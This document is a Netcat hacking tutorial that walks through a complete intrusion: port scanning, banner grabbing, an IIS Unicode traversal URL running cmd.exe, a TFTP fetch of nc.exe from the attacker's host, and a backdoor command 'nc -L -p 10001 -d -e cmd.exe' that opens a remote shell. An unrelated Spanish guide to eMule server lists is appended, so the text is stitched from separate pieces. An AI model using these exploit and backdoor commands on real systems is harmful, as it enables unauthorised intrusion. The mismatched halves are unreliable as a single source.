Tutoweb

S E C U R E I T . C O . I L

Security Through Hacking

Tutorial

NetCat

NetCat Tutorial

Straight forward, no nonsense Security tool Tutorials

S E C U R E I T . C O . I L

SECURITY THROUGH HACKIN G

NetCat – The SwissArmy Knife

© SecureIT.co.il

muts@SecureIT.co.il

http://www.SecureIT.co.il

S E C U R E I T . C O . I L

Tutorial

NetCat

NetCat – The “SwissArmy Knife”

Description

Netcat is a utility that is able to write and read data across TCP and UDP network connections. If you are responsible for network or system security it essential that you understand the capabilities of Netcat. Netcat can be used as port scanner, a backdoor,

a port redirector, a port listener and lots of other cool things too. It’s not always the best tool for the job, but if I was stranded on an island, I’d take Netcat with me ☺

During this tutorial I’ll demonstrate a complete hack, using Netcat only, just to point

out how versatile it is.

Port scanning with Netcat

A scanning example from Hobbit is “nc -v -w 2 -z target 20-30“. Netcat will try connecting to every port between 20 and 30 [inclusive] at the target, and will likely inform you about an FTP server, telnet server, and mailer along the way. The -z switch prevents sending any data to a TCP connection and very limited probe data to

a UDP connection, and is thus useful as a fast scanning mode just to see what ports the target is listening on. To limit scanning speed if desired, -i will insert a delay between each port probe. Even though Netcat can be used for port scanning it isn’t its strength. A tool such as Nmap is better suited for port scanning.

We scanned 192.168.1.1, ports 1-200. We can see that among others, port 80, 21 and

25 are open.

Banner Grabbing with Netcat

So we’re interested in knowing what’s running behind port 80 and 21. We can use

Netcat to grab port banners in the following way:

So we know it’s probably a Windows 2000 machine as it’s running IIS 5.0 and

Microsoft FTP Service.

Let’s try to send a malformed URL which attempts to exploit the File Traversal vulnerability in unpatched IIS servers (Pre SP3). We will be using Netcat to Check for the vulnerability, and if found (and it will!), we will upload Netcat to the IIS server and demonstrate how we can use Netcat as a backdoor.

If you do not know what the Unicode File traversal exploit is, you can check the “IIS Unicode File Traversal” tutorial, or read it up on the net.

1

Basically this exploit allows us to “break out” of C:\inetpub\wwwroot and explore and execute programs anywhere on the attacked machine.

The point here isn’t hacking IIS, but the use of Netcat as a backdoor. Don’t get distracted by the whole “hacking into IIS” thing.

Voila! We’ve sent the URL: http://192.168.1.90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ to the vulnerable IIS server and what we see is a directory listing of the IIS server C drive. Great! Now we want to upload Netcat to the IIS server, so we’ll use TFTP and integrate the TFTP commands into the malformed URL.

Notice that the URL has a plus (+) sign between each command. So the command:

2

tftp –I 192.168.1.9 GET nc.exe

Is transformed to:

http://<Exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe

Also take a note of your TFTP server, to see if it has successfully uploaded the nc.exe file:

Netcat as a BackDoor

So now we have Netcat uploaded to the IIS server, we want to use it to create a backdoor, in order to get a remote command prompt.

In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS server (lets choose port 10001) and then we can connect to this port from our attacking machine…using Netcat of course!

The command we want to give on the server looks like this:

nc -L -p 10001 -d -e cmd.exe

Here’s what that command does:

nc - tells Windows to run the nc.exe file with the following arguments:

-L Tells netcat to not close and wait for connections

-p Specifies a port to listen for a connection on

-d Tells Netcat to detach from the process we want it to run.

-e Tells what program to run once the port is connected to (cmd.exe)

3

If we now want to convert this command for Unicode URL use, it will look like this:

http://<Exploit URL>/c+nc+-L+-p+10001+-d+-e+cmd.exe

Now we will execute Netcat on the remote IIS machine:

This should have started Netcat listening on port 10001 on the IIS machine and should connect the cmd.exe process to the connection stream. From our machine we will try

to connect to the Netcat on the IIS server.

4

Tada! We have now “Shoveled a Shell” using Netcat. We effectively have a remote command prompt of the IIS server, as can be seen from the IPConfig.

Transferring files using Netcat

Let’s look at other possibilities Netcat can provide. Sat we wanted to transfer a file called hack.txt to the IIS server, and for some reason we don’t want to TFTP the file. We can use Netcat to transfer files from one system to another.

To receive a file named hack.txt on the destination system start Netcat on the IIS

server with the following command:

nc –l –p 1234 >hack.txt

On our source system (the attacking computer) we send a file named hack.txt to the

IIS machine with the following command:

nc destination 1234 <hack.txt

5

Issue a ^C on the source system and your done. Be sure to check the file to be sure it

is the same size as the original. This is what hack.txt looks like

And…Voila!

We can see that the file hack.txt has been transferred to the target system, via port

1234.

These are just a few of the wonderful option Netcat has to offer. Definitely worth RTFMing. Imagine all the wonderful possibilities of overcoming firewalls with netcat…

The End

6

7

Actualización de los SERVIDORES de

EMULE.

Para actualizar los servidores de EMULE, coloca las direcciones desde el EMULE, en la opción SERVIDORES o SERVERS, en la parte que dice: “Actualizar server.met desde URL “ o “Update server.met from URL”.

-Direcciones servidores emule- “una dirección cada ves debes ingresar”

http://usuarios.lycos.es/guillespi/server.met http://www.edonkey2000.com/server.met http://users.servicios.retecal.es/ljpadillam/Baltab/server.met http://membres.lycos.fr/portaladsl/server/server.met http://ocbmaurice.dyns.net/pl/slist.pl?download/server-max.met http://2z4u.de/v11yucmy/max/server.met http://www.alldivx.de/servermet2.php?load=max&trace=31000328.416667 http://cablemodem.fibertel.com.ar/servermet/server.met

(Estas son las mejores direcciones, y no necesitaras más).

“Si quieres más detalles, hay tutoriales de EMULE en el Internet.”

Nota:

Mientras mas servidores tengan las personas en el EMULE, más archivos podrán encontrar

las personas y bajarlos, y por ende habrá más personas que tendrán estos archivos, de esta manera será más fácil y rápido bajar los archivos que nosotros buscamos, al tenerlos más personas. “Comparte tus Archivos, si no se comparte, se pierde el sentido del Emule y otros programas similares, y no solo afectas de mal manera a otras personas, sino que a ti mismo. (Mientras más archivos compartas más rápido podrás bajar).”

Te Ayudaras de esta manera a ti mismo, cuando quieras bajar algún archivo. “Estarás ganando créditos”

Los créditos recompensan a los usuarios que suben datos a la red. La cantidad transferida de datos determina la cantidad de créditos obtenidos. Los créditos no son globales, es decir sólo pueden ser usados con aquel cliente que nos los ha otorgado. Son el modificador más alto cuando se calcula la posición y el progreso en la cola de otro cliente. Cuantos más créditos se tengan más rápido se avanzará.

los créditos no se almacenan localmente en el disco duro, sino en el disco duro de los

otros clientes. No es posible hacer un recuento de los créditos propios.

los créditos van emparejados con la identificación segura del usuario. La clave secreta para esta identificación es calculada a partir de información almacenada en los archivos preferentes.dat y criptkey.dat. Si se pierde uno de estos dos archivos no podremos demostrar que somos los propietarios de los créditos.

Si se pierde solamente el archivo criptkey.dat se deberá borrar obligatoriamente el

archivo preferentes.dat. Así que como seguridad ten una copia de ellos. (Debes tener copias actualizadas). Si cambias de versión cambia estos archivos a la versión nueva. Como dato adicional, si se apaga el computador bruscamente (ej. Perdida de corriente) puedes perder los archivos que estas bajando (no los reconoce el Emule,) pero existen y te ocupan memoria en el disco (Carpeta Temp, en la carpeta del Emule u otra carpeta temporal que tu hayas asignado). Así que siempre revisa esta carpeta. (Debes ver que cada archivo .part este con sus correspondientes archivos .part.met y .part.met.bak, si no los tiene borra el Archivo .part específico y si deseas salvar lo que estas bajando. has copias

de los archivos. part.met y .part.met.bak, las descargas reaparecerán pero la descarga será eterna (llegara al 100% pero no descargara), para corregir esto busca su archivo .part especifico de lo que estas bajando, y renombra al archivo .part, cambiando el nombre y la extensión que tiene el archivo especifico, y lo podrás recuperar ).

En síntesis sigue las siguientes reglas.

* EMULE debe estar conectado por largo tiempo. Cuanto más mejor. Si se puede siempre.

* No descargue un solo archivo.

* Intente descargar archivos con 150 fuentes como mínimo.

* Agrega como amigos a las personas que tengan también incompleto lo que estas descargando, de esta forma ellos descargaran más rápido y por ende tendrás tú más crditos

y podrás bajar más rápido ese archivo.

* No intente descargar los últimos lanzamientos. Al menos no rápidamente, espera un poco.

* Sube todo lo que puedas para compartir y no quites los archivos bajados inmediatamente, déjalos un par de días, para ganar créditos.

* No hagas caso de los programas que aceleran el EMULE, son virus o programas dañinos.

* No se quede como un tonto mirando al EMULE. No le gusta que lo miren.

“Que viva el intercambio gratis de archivos, como liberación e igualdad entre las personas del mundo“